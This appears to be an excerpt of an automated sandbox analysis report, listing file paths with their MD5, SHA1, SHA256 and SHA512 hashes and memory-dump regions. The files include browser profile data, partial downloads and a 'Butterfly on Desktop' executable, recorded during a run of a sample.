SHA512 1762b29f7b26911a7e6d244454eac7268235e2e0c27cd2ca639b8acdde2528c9ddf202ed59ca3155ee1d6ad3deba559a6eaf4ed74624c68688761e3e404e54da

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 0877483bad7af3986ebd7cf53ce680a9
SHA1 aa21ac6f97560cca7b005b6d245348f55108233b
SHA256 beab9e210d774b7fae1514cbc0073c2277ce08ca9ebf1be128ec55f34ac50c3a
SHA512 ef8bea338f0212aa306824e9611257f932b7206f411c268cf47cf71d2f7426ed133770e139e17d58b6b3cc1ff1ac488620624ec79b0284c7e7a26083e8de1abf

C:\Users\Admin\Downloads\Unconfirmed 92714.crdownload

MD5 60fabd1a2509b59831876d5e2aa71a6b
SHA1 8b91f3c4f721cb04cc4974fc91056f397ae78faa
SHA256 1dacdc296fd6ef6ba817b184cce9901901c47c01d849adfa4222bfabfed61838
SHA512 3e842a7d47b32942adb936cae13293eddf1a6b860abcfe7422d0fb73098264cc95656b5c6d9980fad1bf8b5c277cd846c26acaba1bef441582caf34eb1e5295a

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\5f7b5f1e01b83767.automaticDestinations-ms

MD5 ac04cef26c4bdbe54177eaca0d05bde4
SHA1 e4ef8673d6ad499a9ccd827b76d6fba1bd659140
SHA256 71645bbcdcf505bea2cefeb59b3906dc556114132f42b39039592d12d59649e9
SHA512 94097c6e74b1a44c9f9c711ea2c6d1689df58c2b86512bfa34708dcd863ca9b4d2fff88f34c4c55767ae168c5d4493bc57d6e8b67416f1a2f2d01ae9c81160b7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 236babef91912701d84b1c84a94acc17
SHA1 3fa556912154f8f6f18c7c68c623d3d94ec288bf
SHA256 2a5ef13de8b0c8c7abf63bae3e6a7a8d22e544e00776e5bf8ae471e33f675eb1
SHA512 9b1aa1fd275dd89b3816de8c6ec877057fd68653252ae65e46b8e5dfe02366e08b9ab5f593c9c15f4d3ef1e70225ee9e6e1f7fbfbef36e3b25e60774a5ce6801

C:\Users\Admin\Downloads\Unconfirmed 63757.crdownload

MD5 f2b7074e1543720a9a98fda660e02688
SHA1 1029492c1a12789d8af78d54adcb921e24b9e5ca
SHA256 4ea1f2ecf7eb12896f2cbf8683dae8546d2b8dc43cf7710d68ce99e127c0a966
SHA512 73f9548633bc38bab64b1dd5a01401ef7f5b139163bdf291cc475dbd2613510c4c5e4d7702ecdfa74b49f3c9eaed37ed23b9d8f0064c66123eb0769c8671c6ff

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 48513f60cf1d4e652fa575b6852d569d
SHA1 b8f1dca6f46c2ed02c831d809681c7104ab4f2c9
SHA256 0d3bdea3ed1ad8b28b7388592fc2f24400954ba33dd3fde4367845293ec3f0ad
SHA512 28d8e53b87ac0d0888f8a8145e029d8a05a7fc227f6244e1dcc5d1fed19c2623c217ca326eff91175b2402ed75f788b80ca6dc167f3f0b40ca748f1c7b70ca8d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 262851632c0b990478c8d492856140f8
SHA1 e4abf10dee41d262e638aab135f840bff592b814
SHA256 d14896e866617362ea9e2699769f6ba101b668ceb09eb0b26357a222ad0f20fb
SHA512 7c2d461b227004e1718c617270c04189c2a34c964a7e591c989cfd946adb61e7ec61bfa745540543a725f36ccc5d38211797785fcc7fca52d1869930696d527a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 113889ea39f19d04d6ee25920180ea77
SHA1 37043875df1d3e3d89596fc03067bf569737e107
SHA256 9dfe54ee8a792987a9db5e0013c5010fbf061f0cc5afce78c5d677b29b46a5b2
SHA512 cdbe992ab4b11d01ab5599631c9444b7067ecbb8093efe8f7ad46654e086e474519aba04a22ea17806cafd779d735b7c2aa8ab4b58b0067774dbf32c49ae4f40

memory/2736-24587-0x0000000000400000-0x000000000056F000-memory.dmp

C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe

MD5 81aab57e0ef37ddff02d0106ced6b91e
SHA1 6e3895b350ef1545902bd23e7162dfce4c64e029
SHA256 a70f9e100dddb177f68ee7339b327a20cd9289fae09dcdce3dbcbc3e86756287
SHA512 a651d0a526d31036a302f7ef1ee2273bb7c29b5206c9b17339baa149dd13958ca63db827d09b4e12202e44d79aac2e864522aca1228118ba3dcd259fe1fcf717

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 a9093629b9d6ecc844e34528effc9447
SHA1 b45754c9c6e3ce17deb24e61a10e0edd9a46d339
SHA256 35913d0a577f245ccf9b201873636d46c27a67b5aa14222d847ac56a6f9beb2e
SHA512 65242778f88353b13e6a418b16dbc97f00bb9a07c33a1751c1d73ed32d3f55997737bf3a4310b963134e04f2d80ca7416197bd85afdde3ab41549c9c7bb188f6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 540f74d6e960643069cdc4daf59f0a95
SHA1 ca4615a14a86ffd6684ec38918a4270f151caeb2
SHA256 54887a33a5d612dc1e6fa7ab42ab93245f89a5551b81a1bd2fe42d27e0924701
SHA512 0bfe5a6c181f4a474b9f81b2f710eb2a348178ead0f053a3f06ba72e8cb1ed6b1fc7d98abba80dd3d5c60ea1ceeda4469614a0f37a7b841f35227b9633debdb0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 49584bdc2d1ecd442e7911ae926b67bd
SHA1 cf00197bc0f21fe5cdd01b11dd0feb20e34479b6
SHA256 d500bb4e3beff75d8d5342fb413e69dd6d1283c899196fd1825b97f65513fbef
SHA512 55f89f426ae32a82b6eabb33c7eb0c43f83a1a64819c3a78c970bd774858716a4f7d54556a8a1d5f75291012c56596c1b46513773b333a5b9637f4d1dca09e09

memory/21824-24797-0x0000000000550000-0x0000000000BFE000-memory.dmp

memory/21824-24798-0x0000000006610000-0x0000000006BB6000-memory.dmp

memory/21824-24807-0x000000000BC80000-0x000000000BC8E000-memory.dmp

memory/21824-24806-0x000000000BCC0000-0x000000000BCF8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML

MD5 7050d5ae8acfbe560fa11073fef8185d
SHA1 5bc38e77ff06785fe0aec5a345c4ccd15752560e
SHA256 cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b
SHA512 a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

MD5 50c09f2694e2b571c60486cfdfd372e9
SHA1 0953b665ee3eba86cec45fdb81124148bcfbbaa1
SHA256 31f766c92ddc5473412316d09d7bea0297392e33f2acdeec7f53d1a4b7f690b2
SHA512 ddd3a0e8032547cb835e831b9f4d7259d5211d72b2ecb724b4fb7c91db35995e2488d8e60500a76a6fc47e789145cfa60452891835e9289c1e0fa35a0956be27

C:\Users\Admin\AppData\Local\Temp\v.mp4

MD5 d2774b188ab5dde3e2df5033a676a0b4
SHA1 6e8f668cba211f1c3303e4947676f2fc9e4a1bcc
SHA256 95374cf300097872a546d89306374e7cf2676f7a8b4c70274245d2dccfc79443
SHA512 3047a831ed9c8690b00763061807e98e15e9534ebc9499e3e5abb938199f9716c0e24a83a13291a8fd5b91a6598aeeef377d6793f6461fc0247ec4bbd901a131

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\sessionCheckpoints.json.tmp

MD5 e6c20f53d6714067f2b49d0e9ba8030e
SHA1 f516dc1084cdd8302b3e7f7167b905e603b6f04f
SHA256 50a670fb78ff2712aae2c16d9499e01c15fddf24e229330d02a69b0527a38092
SHA512 462415b8295c1cdcac0a7cb16bb8a027ef36ae2ce0b061071074ac3209332a7eae71de843af4b96bbbd6158ca8fd5c18147bf9a79b8a7768a9a35edce8b784bf